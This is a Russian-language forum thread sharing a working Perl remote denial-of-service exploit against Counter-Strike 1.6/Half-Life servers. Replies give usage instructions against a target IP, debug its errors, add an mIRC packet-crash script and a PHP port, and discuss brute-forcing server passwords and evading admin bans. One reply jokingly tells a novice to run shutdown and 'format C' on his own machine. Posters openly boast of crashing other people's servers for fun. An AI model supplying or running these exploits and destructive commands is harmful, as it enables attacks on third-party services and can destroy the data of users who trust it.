CS-sploit
 

нашел рульный сплот убивающий серваки CS:

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
# dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD
$BADPASSWORD

у кого какие соображения будут ?

у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш

у меня появились - защищу свой сервер :)

Не плохой сплойт.
Спасибо!

Сам тащусь..... :) но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.

:rolleyes: подскажите пожалуйста куда сам сплойт пихать чтоб отрубить сервак?

Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские ;) так что давай жги сервы !

ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.

remote DoS exploit
 

Сплойт рулит!! :D
а где ты его добыл?? :confused:

а как этот сплойт включать? я на сервак зайдуи как сплоит активировать?

пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS

Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно :) )

Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет

и нас4ет брута: еще для 45-46 протоколов были готовые реализации...

кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне
****

A00000000 1617623932 2

>****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64
ed866538c9db76""\"
****9Invalid hashed CD key.

Можети обьснить мне что это такое?;)

неверный CD ключ, введи в строку (cdkey\\f0ef8a362 58af1bb64ed866538c9db76) действительный ключ...

2kipfun: а ты пробывал? ;) сам пользватся этим експлойтом? ;)

обижашь :) в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...

Я открываю перл делаю как ва написали,мне пишет:
<Do you need to predeclare pl?>
А этот сплоит куда пихать надо?
как можно бан в кс снять?
Подскажите чтото* :(

интернет сервера кс рубить мона?

уверен что c:\Perl/bin/perl.exe может c:\Perl\bin\perl.exe

ой слэшики перепутал простите! :)

как я понимаю, ре4ь идет о плагине к метамоду (амх мод?), тогда имхо это не представляется возможнЫм, кроме как юзанья какой-нить специфи4еской баги плагина, либо воода необработываемого стим-идентификатора для невозможности корректного ввода команды amx_ban

может просто парниша ставил символ `

в valveID? ;)
сомневаюсь 4то он таким макаром приконнектился куда-либо (в ник разве4то, но только для тех, кто не знает командs users; kick #id)

А чо бан снять как в чате нельзя что ли? сменить Ip и все такое еще что бы не кикнули в ник можно вставить не видимый символ, слышал помогает хотя сам еще не пробовал.

есть стоит amxmod (99% серверов) это не спасет

\"A00000000 1617623932 2

>****connect 47 1617623932 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 62 58af1bb64
ed866538c9db76\"\"\\\"
****9Invalid hashed CD key.\"
тоже такая ошибка вылетает,хоя ключ вставлял нормальный

Существует ещё эксплойтик. Нужно просто указать ипшник :)

Реализация под win32: http://lex-studio.by.ru/soft/gs/soft_GameSearcher11.htm

Скрипт для мирк:
CSBoom {
var %ips $$?="Мочи ламаков"
var %buf $chr(254) $+ $chr(255) $+ $chr(255) $+ $chr(255) $+ $chr(0) $+ $chr(0) $+ $chr(0) $+ $chr(0)
/sockudp cs %ips 27015 %buf
echo %ips уничтожен
}

Вот портированный perl сплоит на php

http://underwater.cup.su/cs.php

А не дос ли? Он работает от 3 лица?

как сменить метод аутентификации 4
на 2
что поменять надо?
тупо сменить 4 на 2 не катит